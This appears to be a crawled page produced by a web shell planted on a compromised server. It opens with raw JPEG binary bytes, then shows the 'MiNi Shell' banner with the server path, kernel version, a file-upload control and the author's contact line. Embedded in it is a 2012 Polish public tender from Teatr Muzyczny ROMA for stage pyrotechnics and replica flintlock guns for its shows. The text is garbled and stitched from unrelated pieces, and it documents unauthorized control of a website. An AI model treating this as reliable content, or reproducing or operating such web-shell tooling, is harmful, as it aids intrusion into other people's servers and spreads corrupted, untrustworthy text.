JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120116/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120116/14809-N-2012.html

<p class="kh_header"><b>Warszawa: PRZYGOTOWANIE I OBSŁUGA PIROTECHNIKI SCENICZNEJ NA PRÓBACH I SPEKTAKLACH TEATRALNYCH</b><br>
<b>Numer ogłoszenia: 14809 - 2012; data zamieszczenia: 16.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Teatr Muzyczny ROMA w Warszawie , ul. Nowogrodzka 49, 00-695 Warszawa, woj. mazowieckie, tel. 022 6287071, faks 022 6217233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://teatrroma.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZYGOTOWANIE I OBSŁUGA PIROTECHNIKI SCENICZNEJ NA PRÓBACH I SPEKTAKLACH TEATRALNYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług na rzecz Zamawiającego polegające na przygotowaniu oraz obsłudze pirotechniki scenicznej podczas przedstawień i prób spektakli w TM ROMA w Warszawie, zgodnie z zapotrzebowaniem Zamawiającego.

Wykonawca będzie zobowiązany, w szczególności do:
a) wykonywania zamówienia zgodnie ze scenariuszami przedstawień określającymi sceny użycia efektów pirotechnicznych, 
b) przestrzegania harmonogramu prób i przedstawień podanego do wiadomości i aktualizowanego przez Zamawiającego,
c) dostarczenia na własny koszt i ryzyko środków pirotechnicznych należytej jakości, 
d) zabezpieczania prawidłowego, zgodnego ze scenariuszem przebiegu wszystkich scen przedstawień i prób z wykorzystaniem efektów pirotechnicznych,
e) natychmiastowego podjęcia działań zabezpieczających w przypadku zaistnienia jakiegokolwiek zagrożenia w trakcie scen z wykonywanymi efektami pirotechnicznymi,
f) zapewnienia podczas prób i spektakli odpowiednich replik w ilości i o parametrach zgodnych z opisem przedmiotu zamówienia,
g) serwisowania i konserwowania replik, o których mowa w pkt. f, tak aby umożliwiały bezpieczne wykonywanie przy ich użyciu efektów pirotechnicznych,
h) wykonania zamówienia w sposób spełniający warunki określone przepisami prawa, a w szczególności w Rozporządzeniu Ministra Kultury i Dziedzictwa Narodowego z dnia 15 września 2010 r. w sprawie bezpieczeństwa i higieny pracy przy organizacji i realizacji widowisk.

Lista efektów:

Spektakl pt. Les Miserables.
- ładunek hukowo - błyskowo - dymny (teatralny wybuch) - 8 szt. na jeden spektakl lub próbę,
- ładunek hukowo - błyskowo - dymny plus efekt rozsadzenia skrzyni - 1 szt. na spektakl lub próbę,
- naboje do urządzenia wmontowanego w repliki do odpalenia ładunku hukowego 120 szt. na jeden spektakl lub próbę,
- wystrzał hukowo - ogniowy - 1 sztuka na jeden spektakl lub próbę.

Spektakl pt. Tuwim dla dorosłych.
- ładunek hukowo - błyskowo - dymny - 1 szt. na spektakl lub próbę.

Spektakl pt. Aladyn Jr.
- ładunek błyskowo - dymny - 4 szt. na spektakl lub próbę,
- fontanna iskier ? sek. - 1,5m - 1 szt. na spektakl lub próbę,
- konfetti srebrne - 0,4 kg na spektakl lub próbę.

Spektakl pt. Najlepsze z Romy.
- fontanna iskier 1,2 sek. x 5m - 1 szt. na spektakl lub próbę,
- fontanna iskier 1 sek. x 10m - 1 szt. na spektakl lub próbę,
- fontanna 10 sek. (czerwony punkt plus srebrny snop iskier - 1 szt. na spektakl lub próbę,
- fontanna iskier 0,25 sek. x 3,6m - 1 szt. na spektakl lub prób - efekt zwarcia elektrycznego w scenie laboratorium Filipa Golarza.

Szacunkowa liczba przedstawień i prób:
Les Miserables - 450,
Aladyn Jr - 150,
Tuwim dla dorosłych - 85,
Najlepsze z Romy - 50.

W przypadku mniejszej ilości przedstawień i prób, Wykonawca nie będzie uprawniony do podnoszenia roszczenia wobec Zamawiającego. Podane ilości mogą się różnić od rzeczywistej ilości. Zamawiający rezerwuje sobie prawo do zmniejszenia ilości przedstawień i prób względem ilości szacowanej (przewidywanej).

Wykonawca powinien zapewnić wszystkie materiały niezbędne do wykonania efektów pirotechnicznych, a w szczególności ładunki do urządzeń wmontowanych w repliki.
Wykonawca w ramach zamówienia powinien zapewnić repliki muszkietów i pistoletów skałkowych stylizowane na lata (1815-1832, wiek XIX, Francja).

Wykonawca będzie zobowiązany zapewnić na własny koszt serwis replik oferowanych w ramach wykonywania zamówienia. Wszelka odpowiedzialność za wadliwe działanie replik spoczywa na Wykonawcy. Wykonawca powinien dochować wszelkiej możliwej staranności, aby zapewnić bezpieczne używanie replik. Wszelkie koszty wynikające z konieczności serwisowania i napraw replik spoczywają na Wykonawcy.
Wykonawca jest zobowiązany przed pierwszym użyciem przeszkolić wszystkie osoby używające replik.
Wykaz replik: 
- muszkiet skałkowy ze stalowymi okuciami, drewno (replika) z wmontowanym urządzeniem do odpalania ładunku hukowego - w ilości 20 sztuk,
- pistolet skałkowy krótki, stalowe okucia, drewno (replika) - w ilości 2 sztuk.

Repliki, które zostaną użyte do wykonania zamówienia powinny zostać zaakceptowane przez reżysera ww. przedstawienia w zakresie zgodności stylizacji na lata (1815-1832) wiek XIX i spójności artystycznej. Bez uzyskania akceptacji reżysera, Wykonawca nie może używać oferowanych replik. 
W replikach powinny zostać zamontowane urządzenia do odpalania ładunków hukowych. Z każdej broni używanej w czasie trwania spektaklu powinno paść co najmniej 7 strzałów bez konieczności ponownego ładowania repliki. 

W celu uzyskania możliwie dużej efektywności, Wykonawca będzie zobowiązany do omówienia efektów pirotechnicznych z reżyserem ww. przedstawień.
Efekty pirotechniczne powinny zapewniać wysokie bezpieczeństwo z uwagi na to, iż scena znajduje się w pomieszczeniu zamkniętym. 

Produkty, które będą wykorzystywane w spektaklu muszą być bezpiecznie dla ludzi, a w szczególności dla aktorów, widzów i obsługi spektaklu lub próby. Produkty muszą spełniać wymogi bezpieczeństwa, posiadać niezbędne atesty, pozwolenia, certyfikaty bezpieczeństwa, w tym BAM - PT1 oraz spełniać normy bezpieczeństwa zapewniające bezpieczeństwo ludzi i wyposażenia Zamawiającego, m.in. zgodne z klasyfikacją produktów wg ADR 1.4G. Użycie produktów pirotechnicznych musi być zgodne z zasadami bezpieczeństwa stosowanymi przy produktach pirotechnicznych.

Wykonawca powinien posiadać odpowiednie dokumenty pozwalające zgodnie z polskim prawem na nabywanie i używanie materiałów wybuchowych oraz na przeprowadzanie tego typu pokazów w siedzibie Zamawiającego - obie sceny TM ROMA.

Wykonawca powinien posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie wykonywanego zamówienia, które będzie ważne przez cały okres wykonywania zamówienia na kwotę nie mniejszą niż 250 000,00 zł.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiotem zamówień uzupełniających będzie świadczenie usług na rzecz Zamawiającego polegające na przygotowaniu oraz obsłudze pirotechniki scenicznej podczas przedstawień i prób spektakli w TM ROMA. Zamawiający przewiduje udzielania zamówień uzupełniających w wysokości do 20% wartości zamówienia podstawowego. Zamówienia uzupełniające zostaną udzielone, jeśli ze specyfiki wynikać będzie, iż niezbędne jest zapewnienie większej ilości efektów pirotechnicznych w poszczególnych przedstawieniach spowodowanych zmianą w scenariuszu lub w wizji artystycznej reżysera lub w przypadku zmian repertuarowych prowadzących do zwiększenia się ilości granych przez Zamawiającego spektakli i wprowadzenia nowych tytułów do repertuary lub zaistnieje potrzeba wykonania usług podczas spektakli poza siedzibą Zamawiającego (spektakle wyjazdowe oraz różnego rodzaju imprezy promocyjne).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.36.00.00-2, 39.22.55.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące:

a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
b) posiadania wiedzy i doświadczenia;
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do
wykonania zamówienia;
d) sytuacji ekonomicznej i finansowej.

2. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń.

Ocena spełnienia wyżej określonych warunków odbędzie się wg formuły: spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania.

Dokumenty powinny zostać dostarczone w formie oryginału lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem. 

3. Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wykażą, iż:

a) w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie zrealizowali lub realizują (w przypadku świadczeń okresowych lub ciągłych) trzy kontrakty obejmujące wykonywanie efektów pirotechnicznych w pomieszczeniach zamkniętych przy udziale publiczności,

b) dysponują osobą z co najmniej dwuletnim doświadczeniem w wykonywaniu pokazów pirotechnicznych,

c) dysponują opłaconą polisą, a w przypadku jej braku innym dokumentem potwierdzającym fakt ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 250 000 zł.

4. Wykonawca jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert, spełnianie warunków udziału w postępowaniu i w tym celu powinien przedstawić dokumenty i oświadczenia, o których mowa w sekcji III.4.1 Ogłoszenia. Ponadto Wykonawca powinien wykazać brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 PZP - lista dokumentów potwierdzających brak podstaw do wykluczenia z postępowania zawarta została w sekcji III.4.2-III.4.3 Ogłoszenia.

5. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wykażą, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie zrealizowali lub realizują (w przypadku świadczeń okresowych lub ciągłych) trzy kontrakty obejmujące wykonywanie efektów pirotechnicznych w pomieszczeniach zamkniętych przy udziale publiczności.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wykażą, iż dysponują osobą z co najmniej dwuletnim doświadczeniem w wykonywaniu pokazów pirotechnicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wykażą, iż dysponują opłaconą polisą, a w przypadku jej braku innym dokumentem potwierdzającym fakt ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż 250 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega możliwość wprowadzenia zmiany postanowień umownych o ile po zawarciu umowy ulegnie zmianie obowiązująca stawka podatku VAT, to wynagrodzenie umowne zostanie odpowiednio skorygowane przez strony umowy. Stawka podatku VAT, zostanie naliczona i zapłacona w kwotach należnych według przepisów prawa polskiego w sprawie VAT, obowiązujących na dzień wystawienia faktury lub rachunku przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://teatrroma.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Teatr Muzyczny ROMA w Warszawie, ul. Nowogrodzka 49, 00-695 Warszawa. Sekretariat Teatru (pok. 10, parter) pracuje od poniedziałku do piątku w godzinach 9:00-17:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2012 godzina 13:00, miejsce: Teatr Muzyczny ROMA w Warszawie, ul. Nowogrodzka 49, 00-695 Warszawa. Sekretariat Teatru (pok. 10, parter) pracuje od poniedziałku do piątku w godzinach 9:00-17:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com